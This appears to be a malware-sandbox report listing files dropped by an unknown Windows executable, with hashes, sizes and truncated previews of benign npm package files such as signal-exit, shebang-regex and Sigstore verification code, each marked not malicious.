              Preview:MIT License..Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)..Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHE
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):582
              Entropy (8bit):4.784118052877121
              Encrypted:false
              SSDEEP:
              MD5:D670058E365165E340AC42B0E47B9749
              SHA1:4C10640951D12AD418AA40C29B550FDFE3D2567A
              SHA-256:B8018C6B8CC9900DFD1AC18A54956BA34C453FDC2DA5E5FE555EE8F04133A1C5
              SHA-512:61C32C769774533F4CCC82FC3FE8DEFBBFC2A4B00F884AF9D428C289371CB29A9F45691724A40011F0B458BC038FBFC36707107A756BEB3DE291FC5C5A8311CA
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "shebang-regex",.."version": "3.0.0",.."description": "Regular expression for matching a shebang line",.."license": "MIT",.."repository": "sindresorhus/shebang-regex",.."author": {..."name": "Sindre Sorhus",..."email": "sindresorhus@gmail.com",..."url": "sindresorhus.com"..},.."engines": {..."node": ">=8"..},.."scripts": {..."test": "xo && ava && tsd"..},.."files": [..."index.js",..."index.d.ts"..],.."keywords": [..."regex",..."regexp",..."shebang",..."match",..."test",..."line"..],.."devDependencies": {..."ava": "^1.4.1",..."tsd": "^0.7.2",..."xo": "^0.24.0"..}.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):790
              Entropy (8bit):5.076922369944901
              Encrypted:false
              SSDEEP:
              MD5:F04DC8BB8EC57C41DDD8EF51491862CB
              SHA1:1188299CB9EC40E087DCFEBA49791DA556E21D22
              SHA-256:B173E19B9A78DF305577ACE0E52EF45A4BCC915EA28B47B256DC3B68DCB1F7E7
              SHA-512:99CCAB56E6628453F6BCE7EB468C5C6AF5629D7E825F5E996694FE795D9CB9F7C4842F6608547BB1F77793F59D8C148AEEBC6EE0AA87EC099935193CD20F70E1
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2015-2023 Benjamin Coe, Isaac Z. Schlueter, and Contributors..Permission to use, copy, modify, and/or distribute this software.for any purpose with or without fee is hereby granted, provided.that the above copyright notice and this permission notice.appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES.OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE.LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES.OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,.WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION,.ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):322
              Entropy (8bit):4.815324823882371
              Encrypted:false
              SSDEEP:
              MD5:C805D68B850ED1CF4DD3845DD3E83A33
              SHA1:37FB70CED5475E0791DD985A16B173E214E54960
              SHA-256:AA5F9F7F969E92B30D2D3288E8927B47FAF38663F626C8E9AFC7F5A3B901C816
              SHA-512:DD27C909AD6B8CC15BFF16BA510E672F8DA41603408BFF1A7B0CC0C936E774A0BCD808CD5F914348E74ADEA388E8270EC64EF534F2467F2B13FD497B2C85A7C8
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.unload = exports.load = exports.onExit = void 0;.const onExit = () => () => { };.exports.onExit = onExit;.const load = () => { };.exports.load = load;.const unload = () => { };.exports.unload = unload;.//# sourceMappingURL=browser.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):9177
              Entropy (8bit):4.390574707617886
              Encrypted:false
              SSDEEP:
              MD5:B8E06877F0BB25CC0F4D9F0D2180DE77
              SHA1:E7E98541F80BEFF6D71D1D03ADF3D07636616203
              SHA-256:768C833A144CDEDFFD6294754E4E2753EF45A3EF9F06C617B54F47E24043DE64
              SHA-512:E2E1C60AFC82524A5EE8401AB9B93ECF59A52E545EB7343A4071A97CA3251837B207C84210D5E7E614B5F4779D9EB605C320C5E2A15BF61857B71447F348BFDE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var _a;.Object.defineProperty(exports, "__esModule", { value: true });.exports.unload = exports.load = exports.onExit = exports.signals = void 0;.// Note: since nyc uses this module to output coverage, any lines.// that are in the direct sync flow of nyc's outputCoverage are.// ignored, since we can never get coverage for them..// grab a reference to node's real process object right away.const signals_js_1 = require("./signals.js");.Object.defineProperty(exports, "signals", { enumerable: true, get: function () { return signals_js_1.signals; } });.const processOk = (process) => !!process &&. typeof process === 'object' &&. typeof process.removeListener === 'function' &&. typeof process.emit === 'function' &&. typeof process.reallyExit === 'function' &&. typeof process.listeners === 'function' &&. typeof process.kill === 'function' &&. typeof process.pid === 'number' &&. typeof process.on === 'function';.const kExitEmitter = Symbol.for('signal-exit e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1560
              Entropy (8bit):5.024734599398871
              Encrypted:false
              SSDEEP:
              MD5:8656E7F28E60DEAE56464D1BC405E038
              SHA1:8AFFD484A8F41525979467C9BB2ECE2E04830427
              SHA-256:84F6F2218E3A5DD61E38C9498BCB5465FB90F3900AFDE73956B1855B1E46AF09
              SHA-512:1CDD6BF68FEF45FB3AF76BC66E6D4F6CCB2F7B84865AC0C6EA6EEE9ABBCE6671557F9EE80AF847674F762C77ECCDB09230D775FD4A5CFD32B1C5A07EDEE66078
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.signals = void 0;./**. * This is not the set of all possible signals.. *. * It IS, however, the set of all signals that trigger. * an exit on either Linux or BSD systems. Linux is a. * superset of the signal names supported on BSD, and. * the unknown signals just fail to register, so we can. * catch that easily enough.. *. * Windows signals are a different set, since there are. * signals that terminate Windows processes, but don't. * terminate (or don't even exist) on Posix systems.. *. * Don't bother with SIGKILL. It's uncatchable, which. * means that we can't fire any callbacks anyway.. *. * If a user does happen to register a handler on a non-. * fatal signal like SIGWINCH or something, and then. * exit, it'll end up firing `process.emit('exit')`, so. * the handler will be fired anyway.. *. * SIGBUS, SIGFPE, SIGSEGV and SIGILL, when not raised. * artificially, inherently leave the process in a. *
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):138
              Entropy (8bit):4.612780813465707
              Encrypted:false
              SSDEEP:
              MD5:D6D43204587B3FD9E79C35C686A18B53
              SHA1:BFBB18D77092A60819312C4E0330AE81D50995FB
              SHA-256:57498E3448998C32A94F884F500AC7A2C8B54872F648BEBF1BE1704303A5522C
              SHA-512:FDC1B5CF0C6FC5CA5E4E96FF3DFD2286DE565CFBE0EF18AD4C1F32FD4630A5CE7367922DD0195AE86ED56C514580F78D715E966FB54BE5E4978D332F65B670A2
              Malicious:false
              Reputation:unknown
              Preview:export const onExit = () => () => { };.export const load = () => { };.export const unload = () => { };.//# sourceMappingURL=browser.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):8832
              Entropy (8bit):4.342844455903224
              Encrypted:false
              SSDEEP:
              MD5:56DA1EECDDEA0CF847EE2CCD78282FF7
              SHA1:B1A613C1F0ECA3E3E9933634A3261E4607A05E7E
              SHA-256:EAB13A43C3AEA16E85EA039C60A2E33AF7F5CD1B48946BC97E789D3EC38BB5D7
              SHA-512:754FDCA9A123D162F655F224007135B440056D496FE6E0ADAE5CA724979D4B08F46D9D98B08280D2771593C89B7BFB11A9305C4D44CD04F5500818FE3280DA5B
              Malicious:false
              Reputation:unknown
              Preview:// Note: since nyc uses this module to output coverage, any lines.// that are in the direct sync flow of nyc's outputCoverage are.// ignored, since we can never get coverage for them..// grab a reference to node's real process object right away.import { signals } from './signals.js';.export { signals };.const processOk = (process) => !!process &&. typeof process === 'object' &&. typeof process.removeListener === 'function' &&. typeof process.emit === 'function' &&. typeof process.reallyExit === 'function' &&. typeof process.listeners === 'function' &&. typeof process.kill === 'function' &&. typeof process.pid === 'number' &&. typeof process.on === 'function';.const kExitEmitter = Symbol.for('signal-exit emitter');.const global = globalThis;.const ObjectDefineProperty = Object.defineProperty.bind(Object);.// teeny tiny ee.class Emitter {. emitted = {. afterExit: false,. exit: false,. };. listeners = {. afterExit: [],. exit: []
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1438
              Entropy (8bit):4.9698722489576665
              Encrypted:false
              SSDEEP:
              MD5:27BA40F134ED1531CB67B2AADC1E0A78
              SHA1:C0EBAEE3BA9BCC02688B516E946723FF914BD5AB
              SHA-256:12044052D2037FBB19637C6FB216B1C80C28664134453B9A0FC32FA2FE352C27
              SHA-512:E1CC3162F16673ED0C23BCBD5AC5BFCBE4F608FF57FA667F7E216377DB162D2667874E27348E42B1904A85DE53B5458B1BE47A466A1A981BAA885069028B8E66
              Malicious:false
              Reputation:unknown
              Preview:/**. * This is not the set of all possible signals.. *. * It IS, however, the set of all signals that trigger. * an exit on either Linux or BSD systems. Linux is a. * superset of the signal names supported on BSD, and. * the unknown signals just fail to register, so we can. * catch that easily enough.. *. * Windows signals are a different set, since there are. * signals that terminate Windows processes, but don't. * terminate (or don't even exist) on Posix systems.. *. * Don't bother with SIGKILL. It's uncatchable, which. * means that we can't fire any callbacks anyway.. *. * If a user does happen to register a handler on a non-. * fatal signal like SIGWINCH or something, and then. * exit, it'll end up firing `process.emit('exit')`, so. * the handler will be fired anyway.. *. * SIGBUS, SIGFPE, SIGSEGV and SIGILL, when not raised. * artificially, inherently leave the process in a. * state from which it is not safe to try and enter JS. * listeners.. */.export const signals = [];.signal
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2573
              Entropy (8bit):4.555823065493996
              Encrypted:false
              SSDEEP:
              MD5:0EB7EE110680D45FE7AFA93FC164C480
              SHA1:0A9E356BE2B686CE0C708DFDF98DF90BE4A4DEA1
              SHA-256:EB48647666EFEA05E72968C75C3394D788DA1005B5E1B9C228D28143973F176A
              SHA-512:9E38869F2157BBA7813D4A3FF762739BCF816A20D06448C151821096FBC36BED0515854D734EA1292A58E7C08864E48DC20B475DCACC1E24BD9B90976891FB00
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "signal-exit",. "version": "4.0.2",. "description": "when you want to fire an event no matter how a process exits.",. "main": "./dist/cjs/index.js",. "module": "./dist/mjs/index.js",. "browser": "./dist/mjs/browser.js",. "types": "./dist/mjs/index.d.ts",. "exports": {. ".": {. "import": {. "types": "./dist/mjs/index.d.ts",. "default": "./dist/mjs/index.js". },. "require": {. "types": "./dist/cjs/index.d.ts",. "default": "./dist/cjs/index.js". }. },. "./signals": {. "import": {. "types": "./dist/mjs/signals.d.ts",. "default": "./dist/mjs/signals.js". },. "require": {. "types": "./dist/cjs/signals.d.ts",. "default": "./dist/cjs/signals.js". }. },. "./browser": {. "import": {. "types": "./dist/mjs/browser.d.ts",. "default": "./dist/mjs/browser.js". },. "require": {. "types": "./dist/cjs/browser.d.ts",. "default": "./di
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2527
              Entropy (8bit):4.759200346725952
              Encrypted:false
              SSDEEP:
              MD5:C38768A58288E3EBFFEF7C80ECD9E681
              SHA1:3F477A5207BA61581BB9EABF0C783DD508D09708
              SHA-256:BD91E98807698E298489FD8917F71FAFBC9E7AB986C5DC6DB892FA72A44BAB43
              SHA-512:EE10569B416B128B589CDCA93E2A2F97E6CD65CF6FDB1FF33BF49384BC49EB6DF7A3E0A41D21AA27F40776C1B8AB56B9D9F1311831361708BFC3FA7703F84AD0
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyChain = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const cert_1 = require("../../x509/cert");.const verify_1 = require("../../x509/verify");.function verifyChain(certificate, certificateAuthorities) {. const untrustedCert = cert_1.x509Certificate.parse(certificate.rawBytes);. // Filter the list of certificate authorities to thos
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1173
              Entropy (8bit):4.72202401995185
              Encrypted:false
              SSDEEP:
              MD5:32614019E192FC1EC9E7744DBE89B056
              SHA1:1C8B101FA8EAA428CD5BC1F2871E968A90139252
              SHA-256:1FD6261F888E23D155DCBE9ED434BC153391C44B4D33504B419F26066E58A8AA
              SHA-512:267C02131B8155B8F3E3E9EE6463253C7D9BCA0393107D0CF76EDCDEC72B455E17C3CB6E709ECCE0F3D5C9F8ABC7AFC62EDAB276DDEE195B2235047F658B9C1A
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifySigningCertificate = void 0;.const chain_1 = require("./chain");.const sct_1 = require("./sct");.const signer_1 = require("./signer");.function verifySigningCertificate(bundle, trustedRoot, options) {. // Check that a trusted certificate chain can be found for the signing. // certificate in the bundle. Only the first certificate in the bundle's. // chain is used -- everything else must come from the trusted root.. const trustedChain = (0, chain_1.verifyChain)(bundle.verificationMaterial.content.x509CertificateChain.certificates[0], trustedRoot.certificateAuthorities);. // Unless disabled, verify the SCTs in the signing certificate. if (options.ctlogOptions.disable === false) {. (0, sct_1.verifySCTs)(trustedChain, trustedRoot.ctlogs, options.ctlogOptions);. }. // Verify the signing certificate against the provided identities. // if provided. if (options.signers
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1280
              Entropy (8bit):4.974989707822114
              Encrypted:false
              SSDEEP:
              MD5:599F8C49E62B8D67A39E6A3D4D674263
              SHA1:DC19E6375EFF7E88B52BAFB4E52F0BE9B7973D94
              SHA-256:82D9ADC4187D46F67456A8C490E382EC081C997C9DC0B1B27E766BED3A3DE73D
              SHA-512:DF56201D1941FA69EEED19503425C6E5C095F5ED767901FC6DD2781C5EBE283AF25605703491C8220F2D863F506B185DDC6C0B33D7FBD2772B5BBFEBF8BEF524
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifySCTs = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.function verifySCTs(certificateChain, ctLogs, options) {. const signingCert = certificateChain[0];. const issuerCert = certificateChain[1];. const sctResults = signingCert.verifySCTs(issuerCert, ctLogs);. // Count the number of verified SCTs which were found. const verif
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6102
              Entropy (8bit):4.906764402539808
              Encrypted:false
              SSDEEP:
              MD5:BC28694B5DB7BEB57FB7D4DFC84E24EA
              SHA1:C48574E1A2B809D59F7CD3B4BA65555D50E97BDB
              SHA-256:4028C42319A611B2FEAE1652EDEDDF64453EB6BD226F8C669796BFA82F896A13
              SHA-512:A1EB1ECB94958E8C824981D420CB1E92E8131852CA636E84895959765565ADCC99D5FD2F004C33E9FC521EBF896A0002674B15128E85DD2EEA580C3DF4EBC0E4
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6228
              Entropy (8bit):4.739051273319609
              Encrypted:false
              SSDEEP:
              MD5:0B3C2E23D897380FFD91FDC0DB36487F
              SHA1:5E4FBC907DA862092952E334358051CCC60498D5
              SHA-256:D809E474ECD1E68D133A87D96B7C09C6EA3B23E81B09EFF1C8C2E37E4E28F20C
              SHA-512:0200DEFAF15914F364C99C5E6A5639C65491D554998EF2CAACCCAC1D714A2683810202575DA67F53C992DB57644E0393255F096B083BC1914D28652D3E174AC1
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1166
              Entropy (8bit):4.909303286089814
              Encrypted:false
              SSDEEP:
              MD5:2172D0FDC3F65AC383821D3024F691B1
              SHA1:B99146D0B8F806C3AB0957AE8692B2DC36128989
              SHA-256:1E2F7656A1795E0DDAE0665E72F205BD15597809FE786284A73898C675BB155F
              SHA-512:BF0A76BEB87E584B854EDC50AA737685611398916812F0CBE54F53570C4A982E9741AF8540212BCC83B7804B8F7525188150D61E72AD21CB657B9236138424CC
              Malicious:false
              Reputation:unknown
              Preview:"use strict";./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.Object.defineProperty(exports, "__esModule", { value: true });.exports.PolicyError = exports.VerificationError = void 0;.class BaseError extends Error {. constructor({ code, message, cause, }) {. super(message);. this.name = this.constructor.name;. this.code = code;. this.cause = cause;. }.}.class VerificationError extends BaseError {. constructor(message) {. super({ code
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2432
              Entropy (8bit):5.068528214579181
              Encrypted:false
              SSDEEP:
              MD5:4305625D32DCAE3F19AA90F193910373
              SHA1:761F0A1C373D9F0B9BB5A77C1A79DE7C9378A0E4
              SHA-256:1C1CE84BBE2F88341B2A7C4E6F213DD4942E775B8A7EAFEDBBD35F1A12944BC1
              SHA-512:7FAA9F1352A6F0B87BB50DAFDDA6A7BDDB58D351D6BA1E11B3FD5207F2EDA25D82F96C2ACEF3BA2DB95717D1FDBA4EFC165F82909362D331A44CBD20F7094D45
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verify = exports.sign = exports.createVerifier = exports.attest = exports.VerificationError = exports.PolicyError = exports.TUFError = exports.InternalError = exports.DEFAULT_REKOR_URL = exports.DEFAULT_FULCIO_URL = exports.ValidationError = void 0;./*.Copyright 2022 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.var bundle_1 = require("@sigstore/bundle");.Object.defineProperty(exports, "ValidationError", { e
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3626
              Entropy (8bit):5.008404205171474
              Encrypted:false
              SSDEEP:
              MD5:734260D7C0E1DBA3C2C714FC2BFB9E6F
              SHA1:C617A43D257348BFDEE78365805E11C560E71FA1
              SHA-256:A45DB2BB46936515518475D1BFC6B2D1EC988DD67F466CB0083918D7837B8DE6
              SHA-512:7543505A1E93C6742AF72465745A22BF43CB76207DB02E0FC8FCD925FD74632ACB8580C2779F10D6027223A609CF3A96590021B7E04B0B8BFA0E12776CE7F7BE
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. var desc = Object.getOwnPropertyDescriptor(m, k);. if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {. desc = { enumerable: true, get: function() { return m[k]; } };. }. Object.defineProperty(o, k2, desc);.}) : (function(o, m, k, k2) {. if (k2 === undefined) k2 = k;. o[k2] = m[k];.}));.var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {. Object.defineProperty(o, "default", { enumerable: true, value: v });.}) : function(o, v) {. o["default"] = v;.});.var __importStar = (this && this.__importStar) || function (mod) {. if (mod && mod.__esModule) return mod;. var result = {};. if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k);. __setModuleDef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6964
              Entropy (8bit):4.908662630265872
              Encrypted:false
              SSDEEP:
              MD5:42344E107936F5E384E129C0CDAC146F
              SHA1:6C7EFD193EB6F79E0BAB45B7F6A57777372D5E4D
              SHA-256:92D6DEAB39E5CD56837E10777F2A9F6D8FA5BFE2044DD92818AA92DD24B5A71C
              SHA-512:453DB7F20834770B872D70FF51DCBBCD65B9F6C6ECA1C835590C0548ECB7C9FF50E4F09A2B0075F43450186251CAE9DBFB66E6036FA85C50ADF68155A4131A32
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyTLogBody = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const error_1 = require("../../error");.const util_1 = require("../../util");.const TLOG_MISMATCH_ERROR_MSG = 'bundle content and tlog entry do not match';.// Compare the given tlog entry to the given bundle.function verifyTLogBody(entry, bundleContent) {. const { kind, version } = entry.kindVersion;. const body =
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):6899
              Entropy (8bit):4.704840539601801
              Encrypted:false
              SSDEEP:
              MD5:5A59DA936D9056148D319B0C9E0008BA
              SHA1:66968246A2DE78EB1EB135B7248F3BE5E778AC3D
              SHA-256:E62D88CE69F9E7BB07A87DFA5B1D469271C3075E360BF49248085FD889E980B7
              SHA-512:4180BC245270508C5F73D8DB16B0E5D9E5C9D1AF5B2EF63D245CD6587151FBC4CD3329F2E233C0C2DC6749CB4B8ED577F4696E09C049ECAECFEC2E0104139C57
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyCheckpoint = void 0;.const error_1 = require("../../error");.const util_1 = require("../../util");.// Separator between the note and the signatures in a checkpoint.const CHECKPOINT_SEPARATOR = '\n\n';.// Checkpoint signatures are of the following form:.// ". <identity> <key_hint+signature_bytes>\n".// where:.// - the prefix is an emdash (U+2014)..// - <identity> gives a human-readable representation of the signing ID..// - <key_hint+signature_bytes> is the first 4 bytes of the SHA256 hash of the.// associated public key followed by the signature bytes..const SIGNATURE_REGEX = /\u2014 (\S+) (\S+)\n/g;.// Verifies the checkpoint value in the given tlog entry. There are two steps.// to the verification:.// 1. Verify that all signatures in the checkpoint can be verified against a.// trusted public key.// 2. Verify that the root hash in the checkpoint matches the root hash in the.// inclusio
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4401
              Entropy (8bit):4.906330133308869
              Encrypted:false
              SSDEEP:
              MD5:610DCF1556ACC1B1F483171AE93008CA
              SHA1:7B98AD7DCA8E946F202C6AA33B8F59F991661F10
              SHA-256:0566408F0523D8726176EF6C5FE49D1BCB9BF98EF9321B3B4FC05A6A248AF5FA
              SHA-512:F9D1B856F8A805CC14CC95AFDB5E48B2B9B5F1D86C49F0489209FCF0584C16C7FA5BAF0D583F6ED2FB83DF115A0FE5072E244DF2D72C2EF08A749E9DED51E933
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyTLogEntries = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const bundle_1 = require("@sigstore/bundle");.const error_1 = require("../../error");.const cert_1 = require("../../x509/cert");.const body_1 = require("./body");.const checkpoint_1 = require("./checkpoint");.const merkle_1 = require("./merkle");.const set_1 = require("./set");.// Verifies that the number of tlog entr
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4472
              Entropy (8bit):4.9412294877781076
              Encrypted:false
              SSDEEP:
              MD5:BA08E87D7F2EBD0A3CA1F7448D7F9211
              SHA1:10C760F68AB885D0EE56F823DF97B294E81AE829
              SHA-256:2F4335B7FE4416B5F18C0CECC4EA88CEC79B44A7969CCFF52BB4C2CA16E3F469
              SHA-512:5C9F7D095D499CFFBAC334E0678DA80E3E006A29FAB1EB7F62B9E4BA8369D30CBA1076BDA93A0226D89E02BF98F65741418398F5E0D261A9FE852CA12F93ABE7
              Malicious:false
              Reputation:unknown
              Preview:"use strict";.var __importDefault = (this && this.__importDefault) || function (mod) {. return (mod && mod.__esModule) ? mod : { "default": mod };.};.Object.defineProperty(exports, "__esModule", { value: true });.exports.verifyMerkleInclusion = void 0;./*.Copyright 2023 The Sigstore Authors...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..*/.const crypto_1 = __importDefault(require("crypto"));.const error_1 = require("../../error");.const RFC6962_LEAF_HASH_PREFIX = Buffer.from([0x00]);.const RFC6962_NODE_HASH_PREFI
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3002
              Entropy (8bit):4.6998450498070135
              Encrypted:false
              SSDEEP:
              MD5:DC6C4EF5480B70672B574FEDE65EC31D
              SHA1:E4EAC2164FC47C40D3F947905F9DD16D51C77A94
